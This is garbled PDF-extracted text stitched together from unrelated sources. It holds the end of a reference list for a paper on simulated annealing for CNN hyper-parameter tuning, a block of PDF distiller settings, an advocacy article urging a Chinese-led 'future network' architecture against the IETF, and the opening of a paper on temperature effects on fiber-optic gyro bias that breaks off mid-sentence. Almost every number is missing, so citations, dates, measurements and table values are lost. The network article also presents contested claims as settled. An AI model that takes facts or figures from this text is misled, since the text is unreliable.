. optimization by simulated annealing. science ( ): – doi . /science. . . . konak a, coit dw, smith ae. . multi-objective optimization using genetic algorithms: a tutorial. reliability engineering & system safety ( ): – doi . /j.ress. . . . krizhevsky a, hinton g. . learning multiple layers of features from tiny images. technical report. university of toronto. available at https://www.cs.toronto.edu/~kriz/learning- features- -tr.pdf. lecun y, boser be, denker js, henderson d, howard re, hubbard we, jackel ld. . handwritten digit recognition with a back-propagation network. in: advances in neural information processing systems. burlington: morgan kaufmann, – . lecun y, bottou l, bengio y, haffner p. . gradient-based learning applied to document recognition. proceedings of the ieee ( ): – doi . / . . li l, talwalkar a. . random search and reproducibility for neural architecture search. in: uncertainty in artificial intelligence. amsterdam: elsevier, – . liu h, simonyan k, vinyals o, fernando c, kavukcuoglu k. . hierarchical representations for efficient architecture search. arxiv arxiv: . . liu h, simonyan k, yang y. . darts: differentiable architecture search. available at http://arxiv.org/abs/ . . lu z, whalen i, boddeti v, dhebar y, deb k, goodman e, banzhaf w. a. nsga-net: neural architecture search using multi-objective genetic algorithm. in: proceedings of the genetic and evolutionary computation conference. – . lu z, whalen i, dhebar y, deb k, goodman e, banzhaf w, boddeti vn. b. multi-criterion evolutionary design of deep convolutional neural networks. arxiv arxiv: . . ma b, li x, xia y, zhang y. . autonomous deep learning: a genetic dcnn designer for image classification. neurocomputing : – doi . /j.neucom. . . . real e, aggarwal a, huang y, le qv. . regularized evolution for image classifier architecture search. in: proceedings of the aaai conference on artificial intelligence. vol. . – doi . /aaai.v i . . real e, moore s, selle a, saxena s, suematsu yl, tan j, le q, kurakin a. . large-scale evolution of image classifiers. in: proceedings of the th international conference on machine learning. vol. . – . russakovsky o, deng j, su h, krause j, satheesh s, ma s, huang z, karpathy a, khosla a, bernstein m, berg ac, fei-fei l. . imagenet large scale visual recognition challenge. international journal of computer vision ( ): – . gülcü and kuş ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /scientificamerican - http://dx.doi.org/ . /science. . . http://dx.doi.org/ . /j.ress. . . https://www.cs.toronto.edu/~kriz/learning-features- -tr.pdf https://www.cs.toronto.edu/~kriz/learning-features- -tr.pdf http://dx.doi.org/ . / . http://arxiv.org/abs/ . http://dx.doi.org/ . /j.neucom. . . http://dx.doi.org/ . /aaai.v i . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ schott jr. . fault tolerant design using single and multi-criteria genetic algorithms. master’s thesis, boston, ma: department of aeronautics and astronautics, massachusetts institute of technology. available at http://hdl.handle.net/ . / . simonyan k, zisserman a. . very deep convolutional networks for large-scale image recognition. available at http://arxiv.org/abs/ . . simonyan k, zisserman a. . very deep convolutional networks for large-scale image recognition. arxiv arxiv: . . smith ki, everson rm, fieldsend je. . dominance measures for multi-objective simulated annealing. in: proceedings of the congress on evolutionary computation (ieee cat. no. th ). vol. . piscataway: ieee, – . smith ki, everson rm, fieldsend je, murphy c, misra r. . dominance-based multiobjective simulated annealing. ieee transactions on evolutionary computation ( ): – doi . /tevc. . . springenberg jt, dosovitskiy a, brox t, riedmiller m. . striving for simplicity: the all convolutional net. available at http://arxiv.org/abs/ . . suganuma m, shirakawa s, nagao t. . a genetic programming approach to designing convolutional neural network architectures. in: proceedings of the genetic and evolutionary computation conference. – . suman b. . study of simulated annealing based algorithms for multiobjective optimization of a constrained problem. computers & chemical engineering ( ): – doi . /j.compchemeng. . . . suman b, kumar p. . a survey of simulated annealing as a tool for single and multiobjective optimization. journal of the operational research society ( ): – doi . /palgrave.jors. . sun y, xue b, zhang m, yen gg. a. evolving deep convolutional neural networks for image classification. in: ieee transactions on evolutionary computation. piscataway: ieee. sun y, xue b, zhang m, yen gg. b. completely automated cnn architecture design based on blocks. ieee transactions on neural networks and learning systems : – . suppapitnarm a, seffen ka, parks gt, clarkson pj. . a simulated annealing algorithm for multiobjective optimization. engineering optimization ( ): – doi . / . ulungu el, teghem jfph, fortemps ph, tuyttens d. . mosa method: a tool for solving multiobjective combinatorial optimization problems. journal of multi-criteria decision analysis ( ): – doi . /(sici) - ( ) : < ::aid-mcda > . .co; -o. van veldhuizen da, lamont gb. . multiobjective evolutionary algorithms: analyzing the state-of-the-art. evolutionary computation ( ): – . wang b, sun y, xue b, zhang m. . evolving deep neural networks by multi-objective particle swarm optimization for image classification. in: proceedings of the genetic and evolutionary computation conference. – . weng ch, lai yh, lai sh. . driver drowsiness detection via a hierarchical temporal deep belief network. in: asian conference on computer vision. cham: springer, – . xiao h, rasul k, vollgraf r. . fashion-mnist: a novel image dataset for benchmarking machine learning algorithms. available at http://arxiv.org/abs/ . . xie l, yuille a. . genetic cnn. in: proceedings of the ieee international conference on computer vision. piscataway: ieee, – . gülcü and kuş ( ), peerj comput. sci., doi . /peerj-cs. / http://hdl.handle.net/ . / http://arxiv.org/abs/ . http://dx.doi.org/ . /tevc. . http://arxiv.org/abs/ . http://dx.doi.org/ . /j.compchemeng. . . http://dx.doi.org/ . /palgrave.jors. http://dx.doi.org/ . / http://dx.doi.org/ . /(sici) - ( ) : % c ::aid-mcda % e . .co; -o http://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ yamasaki t, honma t, aizawa k. . efficient optimization of convolutional neural networks using particle swarm optimization. in: ieee third international conference on multimedia big data. piscataway: ieee, – . yao q, wang m, chen y, dai w, li y-f, tu w-w, yang q, yang y. . taking human out of learning applications: a survey on automated machine learning. arxiv arxiv: . . zitzler e, deb k, thiele l. . comparison of multiobjective evolutionary algorithms: empirical results. evolutionary computation ( ): – doi . / . zitzler e, thiele l, laumanns m, fonseca cm, da fonseca vg. . performance assessment of multiobjective optimizers: an analysis and review. ieee transactions on evolutionary computation ( ): – doi . /tevc. . . zoph b, le qv. . neural architecture search with reinforcement learning. arxiv arxiv: . . zoph b, vasudevan v, shlens j, le qv. . learning transferable architectures for scalable image recognition. in: proceedings of the ieee conference on computer vision and pattern recognition. piscataway: ieee, – . gülcü and kuş ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / http://dx.doi.org/ . /tevc. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ multi-objective simulated annealing for hyper-parameter optimization in convolutional neural networks introduction materials and methods results discussion conclusions references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - imperative to build network security system and speed up the future network construction wu aiqun , , vice director of shanghai committee economy of cppcc president of shanghai aerospace information technology research institute vice president of urban risk management research institute of tongji university gao zhangxing iso/iec future network standardization expert, science and technology consultant of nanjing future science technology city abstract—network security is a comprehensive discipline involving computer science, network technology, communication technology, cryptography, information security technology, applied mathematics, number theory, information theory and other disciplines. network security is to protect the hardware, software and data in the network system from accidental or malicious damage, change, and disclosure. the system runs continuously and reliably and normally, and network services are not interrupted. although network security in the future market prospect is very good, but the internet structural defects are known, because in the past nearly years of rapid development of internet technology, the pioneers of the it industry seems to be technology focuses on the network flexibility and ignore the security of the network, so, in the site after the loss of a large number of network attacks, network security technology becomes emergent vacuum in the information technology, for the maintenance of computer network system security maintenance, inspection and repair network vulnerabilities, virus protection, organized by the national high strength against network has serious threat to all countries in the world, in such an environment, the core technology, key infrastructure is the only rely on independent innovation, create a new network system, with the new architecture, a new design, new technology, new resources, new standard and new application to open up a new network space, the building has an independent sovereign and independent control system of network security, it is imperative to accelerate the future network development. keywords-new architecture; new ip; new technology; new resources; new standard; new application i. introduction the idea of "reorganizing the architecture of the web" is not a new idea. it has been around for years. since , the international standardization organization iso/iec has been carrying out the future network standardization project of the new architecture network system, and has set as the phased target for commercial use. this paper based on the research and development experience of iso/iec future network international standard, it shows that network system innovation is the core benefit of the development of china's information and communication technology, and it is imperative! international journal of advanced network, monitoring and controls volume , no. , ii. the structural flaws of the internet are well known around the world china is no exception to the threat posed by state-level organized and high-intensity cyber confrontation to all countries in the world. in order to cope with state-level cyber confrontation, it is impossible not to change the situation that core technologies and key cyber infrastructure are in the hands of others. core technologies cannot be bought and critical infrastructure cannot be sought. the only possibility is to rely on independent innovation, opening up a new network system, with the new architecture, a new design, new technology, new resources, new standard and new application space to open up a new network, the network construction of new frontier has sovereign and independent control of network security system, set up national network defense system, and for the enterprise and society to build a is not subject to sanctions and cyber threat to the survival and development space of peace. this is how countries and nations survive in the age of cyber warfare. under the situation that the internet monopolizes the global information technology facilities, the proposal of the "new architecture network system" is bound to encounter opposition and obstruction from the internet vested interests. the statement on huawei newip by ietf, an american corporate standards agency, is a reflection of this. as the ancient saying goes, "each man is his own boss", which is a natural stance for the ietf. however, everything must have a reason. you can't object for the sake of objecting, you have to have a valid reason. judging by the ietf's claims, the argument is flimsy. the reason why huawei proposed the "new ip" proposal emphasizes the structural defects of the internet, and takes the -bit fixed-length address of the "next generation internet" as an example to illustrate that in many application scenarios, shorter address length is needed, and the structure of the internet does not meet the development needs of the society in the future. it has long been universally acknowledged that the internet is structurally flawed. even many documents in the united states government say a lot about it. for example, at the beginning of the internet design, it did not anticipate the tremendous changes and security threats brought by the development of science and technology decades later. it did not embed security into the architecture design, and many network security problems were caused by the structural defects of the internet. if you were to enumerate the structural flaws of the internet, the list could go on and on. taking 《 future network architecture and its security》 research report written by chinese academy of sciences in as an example, makes a comprehensive analysis of the defects of internet architecture from the perspective of security, and summarizes dozens of security architecture design requirements and solutions. taking the iso/iec international standard draft of 《 future network security architecture》 written by chinese experts as an example, there are technical indicators to be realized in the future network architecture design alone. these indicators correspond to the structural defects of the internet one by one. if you include structural defects in other technical areas such as naming, addressing, routing, infrastructure, economics, topology, management, and so on, there are hundreds of structural problems that need to be addressed. however, the study of the "new architecture of the network" has long since passed the stage of internet defect studies and feasibility studies. so there is no need to devote too much energy to responding to the ietf's objections. iii. the future of the internet leads the world in the past two decades, there have been two ideological trends in the development of the network international journal of advanced network, monitoring and controls volume , no. , technology system. one is the conservative approach stressed by internet vested interests such as isoc, icann, ietf and iana that "the structural integrity of the internet can only be maintained through gradual improvement". the biggest problem with this route is its inability to address structural flaws. patch the method of "overlapping", security holes emerge in endlessly. another trend of thought has emerged since the beginning of this century, advocating a new approach, using the "empty cup design" method, a new blueprint for network architecture on a piece of paper, through a new architecture design to fundamentally solve the security problem. from china's ministry of information industry to establish a decimal network standard working group ( ), to the national science foundation geni - find plan ( - ), to the future network international version of the iso/iec standardization project ( ), the itu -t working group ( - ), the future of the network, to the eu's "brad manifesto" ( ), the president of the united states national security telecommunications commission proposed "shot in the network security project" ( ), the brics calls chairman xi jinping, to speed up the construction of "the brics future network institute" ( ), and then to huawei, china mail tunnels institute, china unicom and china mobile "new ip" proposal, that a series of facts show that over the past two decades, the idea of network architecture reconstruction in china, the us, european and international standards organization has been a research hotspot and frontier technology in the field, has become an irresistible trend of the world. in this world trend, the internet standardization community will no longer hold a significant position. for future network (the future network, fn) as an example, the project is xi president called "the most authoritative international standardization organization" iso/iec organizations set up since , currently has more than a dozen published planning technical report (iso/iec tr series), and are working on the future network architecture and protocol standard system (iso/iec and series standard). as early as years ago ( ), a member of a national body had written to iso/iec, claiming that the internet standards were maintained by the ietf, and that the future network project violated the rights of the ietf, demanding that the project be stopped and withdrawn. on the basis of the position paper submitted by chinese experts to iso/iec, iso/iec adopted the resolution that the future network is a completely new network system, which is not related to the internet and does not fall within the scope of the authority of ietf, so there is no reason to stop or withdraw it. subsequently, the tr series of technical reports, led by chinese experts, received unanimous approval in a vote. iv. the new cyber architecture will not hinder global connectivity although the trend of reconstructing network architecture is irresistible, it still encounters great resistance and interference in the development process in the past. whether it is international or domestic, internet interest monopoly groups spread some wrong views through the media, misleading the decision-making and the public. if analyzed carefully, these views are all prejudices and fallacies, which simply cannot hold water. for example, there is the "fragmentation" view that the new architecture of the network will lead to the fragmentation of the internet and the "balkanization" of the internet. but this view is groundless. take the future network of iso/iec as an example. this is a brand new network system. it only considers the construction of its own system, but it will not touch the basic architecture and facilities of the internet. the relationship between the future network and the internet is like that between the new highway system and the old provincial and national highway system. international journal of advanced network, monitoring and controls volume , no. , the construction of new highways will not hinder the survival and passage of old roads. there is also a view that the new network will hinder globalisation and that countries will not be able to connect with each other. this, too, is a fallacy. take the iso/iec future network as an example. it is a project organized by an international standardization body and actively participated by many countries in the world. it fully conforms to wto norms and is recognized by the world. not only developing countries will support it, but many developed countries are also optimistic about the project. in , for example, the uk national committee submitted comments urging chinese experts to submit technical proposals for future web naming and addressing as soon as possible. a telecom expert from the national association of france led the proposal to help china promote the new future network technology program to african countries. so, as long as the new network has clever design and application space, other countries will not be able to use it. it is an unreasonable assumption without any basis that other countries will not use it. there is ample evidence of this both in the historical literature of the international standards of the future web and in the previous summit declarations of brics leaders. there is a claim that, a new architecture of the network system will make the network investment benefit of telecom enterprises in the past suffered this view also belong to prejudice again in the future network, for example, france telecom has an expert in iso/iec has repeatedly stressed that the future network to consider good protect telecommunications enterprise's investment in , chinese experts to the iso/iec submitted a technical literature, in china a decimal network technology solutions, for example, suggests that the future network to ensure that the new network architecture independent complete and advanced nature, can also with the existing network connectivity, can protect the existing network investment now that china unicom and china mobile have joined huawei's proposal, investment protection is no longer a concern. some people accuse china's independent innovation in the internet system of "shutting the door on the outside world" or "narrow gauge train". this is typical idle talk and scaremongering. take the future of the internet as an example. it is an international standard. how can it become a "closed door"? in the future, the network international standard will have guidance and priority for adoption all over the world. why is it a narrow-gauge train? the whole world has agreed on the future network planning scheme, almost all countries have the need for a new network architecture, how can it be impossible to gradually deploy and apply it globally? moreover, the future network has already been designed to be compatible with the existing network and can be quickly deployed. coupled with the advanced technology and full consideration of the application prospect, the future network has unlimited development potential. v. new architecture future network research and development in line with national policy guidelines in huawei's "new ip" proposal, it is clearly stated that this proposal belongs to the "future network" category. this enables huawei's proposal to be strongly supported by future domestic network technology accumulation and national policies. from the perspective of technology accumulation, china is the first country in the world to carry out the research on the new architecture network system. as early as the late s, china has started the pre-research and tackling of the new network system, and has made technological breakthroughs and obtained patent and copyright protection. in , the ministry of information industry of china set up the working group on decimal network standard, and soon promulgated the industry standard of "digital domain name specification" ( ). in , when the international journal of advanced network, monitoring and controls volume , no. , iso/iec jtc / sc xi'an plenary session considered a future network standardization project with an entirely new architecture, china voted in favor. in the following ten years, china's national members have contributed a lot of technical documents to the future international network standards. the international standards committee, the ministry of industry and information technology and the china institute of electronic standardization have held several meetings to promote the future network standardization, and the central leadership has issued important instructions on many occasions. china is a major contributor to the naming and addressing and security solutions in the future network core technology areas. china voted in favor of the future of internet international standards. therefore, it is the national position of the people's republic of china to establish a new architecture network system based on international standards. this position admits of no challenge. in terms of domestic policy, the chinese government has always attached great importance to the future research and development of network technology. as early as , the state council announced in document no. that the gradual improvement of the internet based on tcp/ip could no longer meet the needs, and that it was necessary to break through the basic theory of the future network, build future network experimental facilities, and incorporate the future network into the national medium - and long-term science and technology planning. in , after a year-long investigation, the chinese academy of sciences submitted a report to the state council, recommending the establishment of major national projects to promote future network research and development with the will of the state. in , the general office of the cpc central committee, the general office of the state council, the cyberspace administration of the cpc central committee, the state standards commission, the ministry of science and technology, and the commission of science and technology of the central military commission all released documents, listing the future network as one of the key technology areas that are "forward-looking, subversive and killer" during the th five-year plan period. in , at the brics informal summit in osaka, japan, president xi jinping proposed to speed up practical projects such as the brics future network institute. in such a situation, our country's scientific research institution should keep highly consistent with the party central committee and the state council, the propaganda department and the mainstream media should also be clear to defend persevere in the position of network sovereignty, avoid becoming the internet interests abroad monopoly the mouthpiece of the group to maintain its backward system, not for our country in the future, a new architecture of sovereignty for the construction of network system. vi. it is urgent to rebuild the new system and accelerate the social business application president xi jinping has always stressed that core technologies cannot be acquired. we need to adhere to independent innovation to change the situation that core technologies in the field of information are controlled by others. in his remarks during the cyber security publicity week, xi jinping called for equal emphasis on governance and innovation in cyber security. in his speech at davos , vice chairman wang mentioned innovation seven times. "we can only find ways to better slice the cake as we make it bigger," and said. "we can't stop and argue endlessly about how to cut the cake. shifting the blame to others will not solve the problem. we now can completely don't have to dwell on the right and wrong of the internet, and should make full use of the new infrastructure network system reconstruction strategic opportunities brought by the international trends, build a new architecture of the network system of big cake, establish complete sovereignty of network new space for the future in our country, and then lift force of the country, the international journal of advanced network, monitoring and controls volume , no. , construction of new cyberspace into an exempt from cyber threats, with endless resources, people's safety work and future generations of survival in the new world, new frontiers and new paradise. this will be a great cause in the present and future. the use of innovation to develop the network technology system is a sovereign state's right to survival and development, no country has the right to interfere. the urgent task of advancing this cause is to accelerate the development of international standards for the future network. huawei's dispute with the ietf over "new ip" is further proof of the importance of international standards. we are developing a new architecture not just to protect ourselves, but to address the urgent need of people around the world for equal sovereignty and a secure network. international standards are not only a platform for technical exchanges among countries on the new network technology system, but also a bridge for china's future network system plan leading the research and development to the world. although china has made proud achievements in this field, there is still much work to be done to form a complete system of future network technology standards. in particular, the future network security architecture based on the new design of the international standard scheme is the key factor of the future network success or failure is the future network crown jewel. in this field, china has achieved world-leading results, and more national resources are needed to integrate it into the future network international standard system. in the environment of increasingly fierce competition for international standards in network system, enterprises will lose precious opportunities if they are allowed to face the competition of "full government power" from other countries. at the same time, china should urgently promote the practical deployment of the new architecture of the future network technology system. the expected commercial time of future internet international standard is . because our country starts in this domain early, already had the ability that invests commercialize now. this preparation includes not only standards and equipment, but also application scenario design. the internet of things is the biggest application scenario of the future network. the internet of things based on the new future network architecture has been issued by the ministry of commerce and the ministry of industry and information technology in , and respectively. due to the advantage of being a late starter, china's future internet of things technology is more in line with the application of the internet of things. from the perspective of social research, there is a very urgent and widespread need. in the increasingly severe international situation and the increasingly imminent threat of cyber warfare, accelerating the deployment of china's autonomous and controllable future network is no longer an option, but a necessary option. the spread of covid- in the us and europe has led to growing calls from western anti-china forces for china and the us to decoupled, a trend that is bound to spread to the cyber sector. we need to consider the question: what if the network decouples? are we ready? this problem is not only huawei will face, but also the difficult problem that people all over the country can not avoid. vii. conclusion the "structural flaws in the internet" proposed by huawei in its "new ip" international standard proposal is a universally recognized fact that cannot be changed even if the ietf denies it. the proposal was submitted to the international standards organization. the ietf has comments that can be submitted to international institutions through its national membership. huawei's idea and proposition of "rebuilding the network architecture" fully conform to the position of iso/iec international network standards in the future, which has been repeatedly demonstrated for years, and its rationality and feasibility have been unanimously approved by the international community. the ietf's international journal of advanced network, monitoring and controls volume , no. , position reflects its desire to protect the interests of the internet, but whether it meets the needs of people around the world needs to be evaluated and considered in international standards bodies. the iso/iec one country, one vote decision-making mechanism is the best mechanism to ensure the sovereign equality of all countries and the fairness of the world. the route of "rebuilding network security architecture" represented by iso/iec future network international standard has been the trend of the world, representing the most important field and direction of the future development of information and communication technology in the world, and has reached the stage of commercial construction. the future network is a frontier technology field which the chinese government attaches great importance to. its technical scheme has been recognized by the world and has a wide application prospect in the world. the future network will sui generis, don't have to rely on existing network infrastructure support, but for the rapid deployment and application, the design with the existing network compatibility mechanism, will not affect the structure stability of the internet, not push the fragmentation of the internet, will not endanger the telecom enterprises existing investments, will not lead to a "closed" or "narrow gauge train" phenomenon. in the future, the network also has new core resources with great industrial value, which can drive huge social and economic value and industrial development space. "ten years to sharpen a sword". the future of our country network is twenty years, in the theoretical study, the top design, the international standard, the system scheme, the security architecture, autonomous control, the core equipment, sovereign legislation, offensive and defensive drills, and strategic planning, etc, have mature solution, prepared and available equipment system, can be said to be the everything is ok, only owe the east wind. the investment of huawei and other organizations indicates that the future network is on the fast track of development. at present, the international situation is very serious, and the threat of national-level cyber confrontation and cyber warfare is increasingly imminent. it is an urgent task to strengthen the construction of the national network security defense system with the new architecture of the future network technology system. in the past, there have long been differences in the development path of the network system, but there has been a growing consensus to rely on the new architecture of the network to strengthen national cyber security. we should seize the opportunity, give priority to national and national interests, discard past grievances, unite all forces that can be united, form the broadest possible united front, and accelerate the construction of a new architecture for future network standardization and social and practical deployment. about the author wu aiqun: deputy director of the committee of economy of the cppcc committee of shanghai, president of shanghai academy of aerospace information technology, vice president, professor, doctoral supervisor of urban risk management institute of tongji university, etc. telephone number: . gao zhangxing: iso/iec future network standardization expert, science and technology consultant of nanjing future science and technology city. editor in charge: yang yining references [ ] jung h., & koh s.j. mobile optimized future internet”, http://protocol.knu.ac.kr/tech/cpl-tr- - -mofi- .pdf, jun. electronic industry standard of the people's republic of china [m]. . [ ] xie jianping, huang changfu. current situation and development of decimal network [j]. information technology and standardization, ( ): - . [ ] zhang yunghui, jiang xinhua, lin zhangxi. comparison between ipv and ipv [j]. computer engineering, ( ): - . [ ] soliman h., castelluccia c., malki k. e., bellier l. hierarchical mobile ipv (hmipv ) mobility management,” ietf rfc , oct. paper title (use style: paper title) international conference on sensor network and computer engineering (icsnce ) analysis and compensation about temperature influence to optical-fiber gyro zero bias zhou haiyuan, yang heng, wang qianxue, liu xinming and pan liang china satellite maritime tracking & controlling department jiangyin, , china e-mail: @qq.com abstract—compared to other gyro the dynamic performance of optical-fiber gyro was better and the price was cheap. optical-fiber gyro was suit to build sins. by the way, zero bias of optical-fiber gyro was sensitive to temperature, and the compensation technique was a hot point in ins research. according to the above situation, based on one type optical- fiber gyro, the influence mechanism about temperature to optical-fiber gyro zero bias was studied, and a test method was designed, the experiment results was analyzed, finally based on multinomial simulation a compensation math model was established, and the research result discovered that temperature was a big influence to optical-fiber gyro zero bias, and it can be fixed by a compensation math model based on multinomial simulation. keywords-multinomial simulation; gyro zero bias; temperature characteristic; temperature compensation; temperature sensor i. introduction gyro was the core component of inertial navigation equipment, and it was the key factor to determine the position and attitude accuracy of inertial navigation equipment. at present, the traditional liquid lifting gyro has entered the technical stability period, the accuracy has been difficult to break through; laser gyro technology has also been basically mature, and entered the stage of engineering application. compared with the liquid lifting gyro, optical fiber gyro has the advantages of simple structure, fast starting, long service life, small volume and so on; compared with the laser gyro, with lower price and higher dynamic performance, optical-fiber gyro was more suitable for construction of strap down inertial system. the temperature was main factors affecting the performance of optical-fiber gyro[ - ], the temperature change will lead to deviation from the original state of the optical-fiber gyro because of its optical element temperature sensitive character, which affects the output accuracy of the system, so the compensation about optical-fiber gyro zero bias caused by temperature change was most important problem to be solved to inertial navigation equipment based on optical-fiber gyro. ii. influence of temperature on zero bias of optical-fiber gyro a. experimental design the optical-fiber gyro used in this experiment was a kind of advanced high precision, which requires the gyro performance index: zero bias stability was better than . º/h, and the scale factor stability was better than ppm. test hardware conditions include temperature control turntable and supporting facilities, the specific configuration was as follows: ) temperature control turntable the temperature range was between - ℃ and + ℃; the output range was . º/s to º/s; the rate stability was × - ; the temperature stability was ± . ℃. ) matching test facilities the vibration isolation foundation avoids the interference of external vibration to the test. the data acquisition device was used for the acquisition of gyro data, and the turntable control computer was used for the control of turntable and the collection of gyro data. fig. was a connection diagram of temperature experimental equipment. the temperature sensors were located at the top and the side of the gyro shell for recording the ambient temperature. after the gyro was started, the output of the gyro and the temperature of the temperature sensor were collected, and the sampling frequency was sampled times per second. testing turntables fiber optic gyro data acquisition and processing system computer temperature output signal control signal sensor sensor figure . equipment connection about temperature test b. test result in order to test the temperature characteristics of the optical-fiber gyro, a total of fixed temperature gyro zero bias tests were arranged according to the experimental scheme. experiments were conducted at each fixed mailto: @qq.com international conference on sensor network and computer engineering (icsnce ) temperature, and the results of an experiment were shown in table . table i. results about gyro zero bias about different temperature serial number time length (s) temperature (℃) gyro zero bias mean value(º /h) gyro zero bias standard deviation (º /h) gyro zero bias standard deviation after point moving smooth(º/h) - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . c. data analysis according to table data, take the serial number test as an example, the sensor temperature was . ℃, the gyro zero bias was . º/h, and the standard deviation was . º/h, which shows that the noise of the gyro was random (random walk). the gyro zero bias was smoothed after point moving average, and the standard deviation was reduced to . º/h. after smoothing the data, the standard deviation was obviously smaller. compared to the sets of data, it can be found that the temperature has a larger influence on the gyro zero bias mean, the same to the test group of fifth temperature of . ℃ for the minimum output corresponding to the . º/h, fourth sets of temperature . ℃ corresponding to . º/h for maximum output, relative error was . %, the absolute error was . º/h, the temperature must be corrected to compensate the effect of optical-fiber gyro zero bias. iii. modeling of zero bias compensation from the ieee to the temperature drift of optical-fiber gyro the definition: change of 